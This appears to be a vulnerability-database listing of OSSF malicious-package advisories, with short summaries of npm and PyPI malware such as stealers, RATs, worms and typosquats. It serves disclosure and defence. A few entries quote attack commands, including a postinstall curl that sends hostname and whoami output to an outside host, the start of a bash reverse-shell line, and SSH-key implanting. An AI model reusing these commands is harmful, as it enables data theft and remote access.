Lucene search
K
OssfMost viewed

226481 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/15 12:29 p.m.16 views

Malicious code in venv-utils (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 9af11c23295a9a592b6fd62d62490669a752ab6dc6c0b755ebd068ec6371375f Package contains code to silently execute a RAT-like agent, allowing the attacker to access the file system and execute arbitrary code. --- Category: MALICIOUS...

6.2AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/15 10:43 a.m.16 views

Malicious code in atlassian-jenkins-helper-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 526951af835c5c23fe1c8c7b4d5180e324baeae2de710b4a3d862c2e372da4af The package atlassian-jenkins-helper-utils was found to contain malicious code. Source: ghsa-malware...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/14 7:25 p.m.16 views

Malicious code in rimraf-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a59d88d733415216903578b3c3806d76405a23a7cca56ee355eb6725e4e930d4 [email protected] impersonates the widely-installed rimraf package index.js is a dummy stub that internally identifies itself as 'lodash-js — Just a...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/13 3:9 a.m.16 views

Malicious code in knot-rails-assets-pipeline (RubyGems)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security a4e4f74e90479d472a307d311d48214827e21cf93ecf9b0b62ff2cb72adb2c9e This package is a malicious packages part of the Go BufferZoneCorp and RubyGems knot-theory clusters. The packages in this cluster steal...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/12 7:5 p.m.16 views

Malicious code in afk-react-intl (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 807b3bc717a7c8f60ecb69d7653fd0942431e9e6adf27cb34e2f68b4bae06cec The OpenSSF Package Analysis project identified 'afk-react-intl' @ 99.99.99 npm as malicious. It is considered malicious because: - The package...

5.8AI score
Exploits0
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/12 4:35 p.m.16 views

Malicious code in aoflmkt (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 7d5581b164c03c1b17ecfa5e7bab0422b7168cb3a8d44108ac108467e37adbc2 The OpenSSF Package Analysis project identified 'aoflmkt' @ 1.0.0 npm as malicious. It is considered malicious because: - The package communicat...

5.8AI score
Exploits0
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/12 7:44 a.m.16 views

Malicious code in 01-0redi7qgbz0uv (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5ceb633970757ab5d5ee0b64512c18d46be8402ac2169769101655a697ee5d6d the analysis found that this package has a garbage randomized name '01-0redi7qgbz0uv', empty description, placeholder test script, and an index.js th...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/12 7:43 a.m.16 views

Malicious code in 8q (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1a10addd46910ba157e59c0c301c15ea56de73adb23c4d3422520b67876cdc0e The package's declared main entry router.js is an IIFE that runs the moment an installer's code executes require'8q' or import '8q'. On load it...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/12 5:49 a.m.16 views

Malicious code in @ml-toolkit-ts/preprocessing (npm)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security 5e1924464368f0c5816ee84e000cc47017f44045140feafbbc9e685d847ed5a5 This package was compromised as part of the "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/12 12:22 a.m.16 views

Malicious code in @tanstack/solid-start-client (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 4905d7bb1a4d6f69ec73fe4cc8fa958262fcab1397fed5725ac39db447f6239a Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References6
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/11 11:38 p.m.16 views

Malicious code in @tanstack/eslint-plugin-router (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ff80f01eaa71625ecdc195880a0c0f1ef71da7fa81d01422abf9634f74b5d6be Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/10 12:0 a.m.16 views

Malicious code in erslove (npm)

erslove is a typosquatting package impersonating resolve, the module resolution library implementing require.resolve semantics. The package bundles the legitimate resolve source and test fixtures to appear functional while hiding a credential-theft payload in index1.js, executed at install time v...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/08 7:35 a.m.16 views

Malicious code in yeahmankema (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 e82095096c026f9ea1f8a44e7b94b0f9def1346ef887a8a6bb4e11aedc5abd63 Package exfiltrates screenshots and network information to a hardcoded target. --- Category: MALICIOUS - The campaign has clearly malicious intent, like...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/04 1:43 a.m.16 views

Malicious code in shopify-draggable (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f631da0153ed8da6498d0662d71d654389a24327b946635a3664d0de9d20b03f The package shopify-draggable was found to contain malicious code. Source: ghsa-malware...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/02 3:40 a.m.16 views

Malicious code in currenttimerpy (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 ccd5c81889e68b6ae8a0e8ef90b7c3a4dc447b08872ad6ac48ce94804985379d During import, the package automatically downloads and executes code that first acts as an infostealer and then starts code acting as a RAT. It connects with a...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/05/01 10:46 p.m.16 views

Malicious code in graphicctx (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 8867133b18f35132bf0096bdbd5d1891e87f8a07bbba09f6dffe21c8b048596e Packages in this campaign are used to exfiltrate data from users installing code from prepared Github repositories. Packages contain code to exfiltrate files...

5.8AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/04/29 3:33 p.m.16 views

Malicious code in bbranger (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 9cb5c90bcde5bf7b63607d4bf5e7be1ccb7b5c9eb2eb92e32dab102be5df3687 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

5.5AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/04/23 7:27 a.m.16 views

Malicious code in eth-logger (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 843cae77c9aaf84bef1b7d5e46e27795d5203d2959a39b2797f0e1248b4995c7 The package eth-logger was found to contain malicious code. Source: ossf-package-analysis...

5.8AI score
Exploits0
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/04/14 9:21 a.m.16 views

Malicious code in centralogger (npm)

dom-utils-lite and centralogger, with identical payloads. On npm install, a postinstall hook fetches the attacker’s SSH public key from a Supabase storage bucket, appends it to /.ssh/authorizedkeys, harvests the victim’s IP, username, and hostname, then uploads that metadata to the same Supabase...

5.7AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/04/01 9:11 a.m.16 views

Malicious code in raydium-bs58 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 866a59b63d949dfe36c6082c9daa6fddcb18993724e9980c245a49ff59944fee The package raydium-bs58 was found to contain malicious code. Source: ghsa-malware b6ba968c5cb1e12fc81fc5ed1694c2221b6ac0299199508b80100927801f07f3 A...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/03/18 12:10 p.m.16 views

Malicious code in test6789.client (NuGet)

--- -= Per source details. Do not edit below this line.=-...

5.8AI score
Exploits0
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/02/24 10:45 p.m.16 views

Malicious code in examplereactnative76 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a118efca65c484515f9ae2cee508db99ef356bb6dc1e9ec249858e561f96f089 The package examplereactnative76 was found to contain malicious code. Source: ossf-package-analysis...

5.9AI score
Exploits0
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/02/04 10:24 a.m.16 views

Malicious code in tablescene (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 75f24eaea6c977e93d35c431f9bedc66b7757fd5c5635425c28801dad3b50de9 Packages contain hidden code that is effectively run during importing or using the library, and downloads second stage code. Then, a process running in...

5.8AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/02/03 5:1 a.m.16 views

Malicious code in freedom-baileys (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4512163cbee4473b3f1fec8504df8a156ada7ac4ca90a763fb9968ba58178ade The package freedom-baileys was found to contain malicious code. Source: ghsa-malware 7c21d9105c9c9c7f67546b69fd620327c3b304280b1113d557601d49a0639cd...

5.4AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/01/09 3:4 a.m.16 views

Malicious code in n8n-nodes-hfgjf-irtuinvcm-lasdqewriit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f4dabf38b16acea59219df3a3f57a396f3ebe958985096579cd43c419609b764 The package n8n-nodes-hfgjf-irtuinvcm-lasdqewriit was found to contain malicious code. Source: ghsa-malware...

6.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2025/11/25 12:16 a.m.16 views

Malicious code in posthog-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2b422f278bf27e062b349e97360b6919e773122f21656f23d6da583ce7cb1a92 The package posthog-js was found to contain malicious code. Source: google-open-source-security...

6.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2025/11/19 5:55 a.m.17 views

Malicious code in sissel.shopify-liquid (VSCode:https://open-vsx.org)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security 8174c373fd818eb48388777436e30f84dcf0846593fcbddc3e73f898858a4317 This extension is malicious. When installed it runs an info stealer that exfiltrates user data including credentials and cryptocurrency...

7AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/19 5:10 a.m.15 views

Malicious code in node-slot (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0d71bcdec983467ab6a47b538e524abc1cdafc98b411761bffb375be17d72009 On npm install, package.json's postinstall hook executes node test.js which invokes code in index.js that performs two distinct attacks on the...

5.9AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/14 7:21 a.m.15 views

Malicious code in sys-info-cli-app (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1423c435a0e9e86338dd64d138fb1697580751ade2b7486880e21785e1b3eb47 The package's collect.js gathers host identifiers os.hostname, os.homedir along with filesystem and childprocess introspection and POSTs them to a...

5.2AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/13 8:11 p.m.15 views

Malicious code in axl-ui (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6fbc071f0ee6323c87fa6be049a9b151217f7146605ef89b4494f7ef07e7d534 [email protected] is a dependency-confusion squat targeting an internal package name. package.json declares a postinstall hook node beacon.js that fires...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/13 12:23 p.m.15 views

Malicious code in easy-time666 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/13 7:19 a.m.15 views

Malicious code in sheratan_haha (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6b473b40e0c041d34e85161ed8c91e0e00d006a0822698a0d3994876cb685ddd On npm install, the package's declared postinstall hook node postinstall.js runs whoami on the installer's machine and POSTs the output to a hardcode...

5.4AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/13 7:7 a.m.15 views

Malicious code in class-synth (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 1aa63407d7400b4819d0739dedad0a32d9ae29b18509693c2e8763cf30275271 class-synth is advertised as a small class/style/date utility library, but its main entry dist/index.js contains a hidden top-level async IIFE init...

5.4AI score
Exploits0References8
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 7:41 a.m.15 views

Malicious code in chai-net-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cd5f4bb3d7abae3be57c7521b84016b6484d4c21bd2898fcde043d376513cf1e chai-net-test ships a remote-code-execution dropper behind its public chain API. When a consumer calls chain... the documented entry point,...

5.5AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/11 7:19 a.m.15 views

Malicious code in internallib_v346 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 16f3f2c0990e02417fdf7012e6531393e81f786bb16019d0efdb03c049817f90 Package name targets an internal-only namespace and ships a reverse-shell payload. index.js line 5 unconditionally invokes exec'/bin/bash -c "bash -i...

5.4AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/09 8:34 p.m.15 views

Malicious code in mcp-server-fetch (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 34dfb6dc382073bace8a4d413b28000ff42770d04b9f69a88906230e2d83260a Package squats the unscoped name mcp-server-fetch an MCP server name commonly invoked via npx mcp-server-fetch by AI coding agents and developer...

5.5AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/09 5:29 p.m.15 views

Malicious code in ui-ng-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 198750c8e5d6f4d8a3f3f788a2fd9286f43b5a447bb0e3495b50663c44ddd2a7 Package [email protected] is an empty shell index.js exports , no author, no description, no functionality with a single dependency declared as...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/09 5:18 p.m.15 views

Malicious code in shopify-app-bridge-internal (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b21c63417fe3a82fd514d0af7c913fb3c1cd62915839dc8910483fb6484bbbd9 The package's preinstall lifecycle script in package.json runs unconditionally on npm install and issues an HTTPS GET to...

5.5AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/08 10:31 p.m.15 views

Malicious code in xfoofoox (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 94e46dfacc8ffb015e2258d96dedda0eebb7118144ace7021794c88b319ade14 During import, the package starts a reverse shell --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign:...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/08 8:47 p.m.15 views

Malicious code in spaysrbx (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d4bae51ef6cd61eb9bfc38ac2d8dd8ad1f38d22c4e55b8ccdfc53cd2ed94076f On import spaysdata, the package's init.py invokes mainentry in spaysdata/main.py, which performs three attacker-benefit actions automatically: 1 rea...

5.6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/07 10:34 a.m.15 views

Malicious code in clip-logger (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 0ee6244e4630a085f305c933f50283a232dda9e0d8e0ba3bab2bb880e53a736d The package contains code to steal clipboard content to a predefined remote location. If run in the right way, the code will periodically check the clipboard a...

5.6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/05 12:53 a.m.15 views

Malicious code in node-env-resolver-dotenvx (npm)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security a6c7977dbc054cdb7fe56da0d2fbd26e2a6fed695deb4263ccbf4adfedd86acb The Miasma malware is a self-propagating worm that spreads across the npm registry by abusing weaponized binding.gyp files to achieve...

5.7AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/05 12:53 a.m.15 views

Malicious code in awaitly-analyze (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware b77cddba130960f19c0c0b71b952811cc8dabd41e848d5305497cd16757ba2e3 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/05 12:53 a.m.15 views

Malicious code in creditcard.js (npm)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security a6c7977dbc054cdb7fe56da0d2fbd26e2a6fed695deb4263ccbf4adfedd86acb The Miasma malware is a self-propagating worm that spreads across the npm registry by abusing weaponized binding.gyp files to achieve...

5.7AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/05 12:53 a.m.15 views

Malicious code in @ethlete/components (npm)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security a6c7977dbc054cdb7fe56da0d2fbd26e2a6fed695deb4263ccbf4adfedd86acb The Miasma malware is a self-propagating worm that spreads across the npm registry by abusing weaponized binding.gyp files to achieve...

5.7AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/05 12:53 a.m.15 views

Malicious code in executable-stories-demo (npm)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security a6c7977dbc054cdb7fe56da0d2fbd26e2a6fed695deb4263ccbf4adfedd86acb The Miasma malware is a self-propagating worm that spreads across the npm registry by abusing weaponized binding.gyp files to achieve...

5.7AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/05 12:53 a.m.15 views

Malicious code in @contaazul/n8n-nodes-contaazul (npm)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security a6c7977dbc054cdb7fe56da0d2fbd26e2a6fed695deb4263ccbf4adfedd86acb The Miasma malware is a self-propagating worm that spreads across the npm registry by abusing weaponized binding.gyp files to achieve...

5.7AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/05 12:53 a.m.15 views

Malicious code in autotel-devtools (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 1d9ead83772087e781dd41428b81aec15c104b5064f20f0c47e911025942bd01 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.9AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/05 12:53 a.m.15 views

Malicious code in eslint-plugin-executable-stories-vitest (npm)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security a6c7977dbc054cdb7fe56da0d2fbd26e2a6fed695deb4263ccbf4adfedd86acb The Miasma malware is a self-propagating worm that spreads across the npm registry by abusing weaponized binding.gyp files to achieve...

5.7AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/05 12:53 a.m.15 views

Malicious code in autotel-drizzle (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 296ec225ea5d6328333ec1641f1562f475b1ed521a003427b581aa288cc735b7 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.9AI score
Exploits0References3
Total number of security vulnerabilities5000